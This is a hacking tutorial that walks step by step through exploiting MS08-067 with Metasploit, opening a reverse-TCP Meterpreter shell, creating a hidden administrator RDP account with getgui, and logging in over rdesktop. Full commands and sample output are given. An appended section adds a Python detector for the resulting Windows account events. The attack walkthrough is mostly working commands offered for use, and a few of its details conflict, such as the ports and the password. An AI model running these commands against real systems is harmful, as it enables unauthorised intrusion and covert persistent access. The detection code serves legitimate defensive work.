RDP To Victim

Follow these steps to create an RDP user on the victim's machine.

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside the msf console, type:*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
*The output will be: PAYLOAD => windows/meterpreter/reverse_tcp*

*Now set the local host (the hacker's local IP address):*
msf exploit(ms08_067_netapi) > set LHOST 192.168.50.15
*The output will be: LHOST => 192.168.50.15*

*Now set the remote host (the target's local IP address):*
msf exploit(ms08_067_netapi) > set RHOST 192.168.50.7
*The output will be: RHOST => 192.168.50.7*

*Now set LPORT and RPORT:*
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > show options
*This prints the full set of options for the exploit, so you can check everything before running it*

Now, let’s make it work. Let’s type:
msf exploit(ms08_067_netapi) > exploit

*And you will get this output*
[*] Started reverse handler on 192.168.50.15:4444
[*] Automatically detecting the target…
[*] Fingerprinting: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability …
[*] Sending stage (885806 bytes) to 192.168.50.7
[*] Meterpreter session 1 opened (192.168.50.15:444 -> 192.168.50.7:1045) at 2015-10.11 14:20:19 +0300

meterpreter > run getgui -e
*You will get this output*
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enable Remote Desktop
[*] ----RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] ----Terminal Services server is already set to auto
[*] ----Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20151112.1556.rc

*Let’s continue*
meterpreter > run getgui -u yesigotyou -p try2hackme
*You will get this output*
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] ----Adding User: yesigotyou with password: try2hack
[*] ----Hiding user: from windows login screen
[*] ----Adding User: yesigotyou to local group 'Remote Desktop Users'
[*] ----Adding User: yesigotyou to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20151112.1556.rc

meterpreter >

[LET’S RDP]
#1) Open terminal & type:
tux@kali:~$ sudo rdesktop -u yesigotyou -p try2hack 192.168.50.7
*The -u option gives the username and -p the password*

P.S.: Look at the second output; this is the most important thing during the attack process:
[*] Hiding user: from windows login screen
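From the defender's side, the sequence getgui leaves in the Windows Security log is distinctive: an account is created (event 4720) and within moments added to 'Remote Desktop Users' and 'Administrators' (event 4732). The following is an added detection example, not part of the original post; the event records are constructed samples, and the ten-minute correlation window is an assumption.

```python
"""Flag a freshly created local account that is promptly added to an
RDP-capable or administrative local group (the getgui pattern).
Sample events are constructed, not real telemetry."""
from collections import namedtuple
from datetime import datetime, timedelta

# Minimal extract of a Security-log record: 4720 = account created,
# 4732 = member added to a security-enabled local group.
Event = namedtuple("Event", "time event_id account group")

SAMPLE_EVENTS = [  # constructed
    Event(datetime(2015, 11, 12, 15, 56, 1), 4720, "yesigotyou", None),
    Event(datetime(2015, 11, 12, 15, 56, 2), 4732, "yesigotyou", "Remote Desktop Users"),
    Event(datetime(2015, 11, 12, 15, 56, 2), 4732, "yesigotyou", "Administrators"),
    # Legitimate-looking activity that must NOT be flagged:
    Event(datetime(2015, 11, 12, 9, 0, 0), 4720, "svc_backup", None),
    Event(datetime(2015, 11, 12, 16, 30, 0), 4732, "svc_backup", "Backup Operators"),
    Event(datetime(2015, 11, 13, 10, 0, 0), 4732, "alice", "Remote Desktop Users"),
]

SENSITIVE_GROUPS = {"Remote Desktop Users", "Administrators"}
WINDOW = timedelta(minutes=10)  # assumed correlation window


def find_suspicious_rdp_accounts(events, window=WINDOW):
    """Return {account: [groups]} for accounts created and then added to a
    sensitive group within `window`. Existing accounts (no 4720 seen) and
    additions to other groups are ignored."""
    ordered = sorted(events, key=lambda e: e.time)
    created = {e.account: e.time for e in ordered if e.event_id == 4720}
    hits = {}
    for e in ordered:
        if e.event_id != 4732 or e.group not in SENSITIVE_GROUPS:
            continue
        t0 = created.get(e.account)
        if t0 is not None and timedelta(0) <= e.time - t0 <= window:
            hits.setdefault(e.account, set()).add(e.group)
    return {acct: sorted(groups) for acct, groups in hits.items()}


if __name__ == "__main__":
    for acct, groups in find_suspicious_rdp_accounts(SAMPLE_EVENTS).items():
        print(f"ALERT: new account {acct!r} added to {groups} shortly after creation")
```

On a live host the same two event IDs can be pulled from the Security log and fed through this function; the hidden-from-login-screen step does not prevent the account creation and group changes from being logged.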

ENJOY! 🙂

Here is an example by Gamer Forever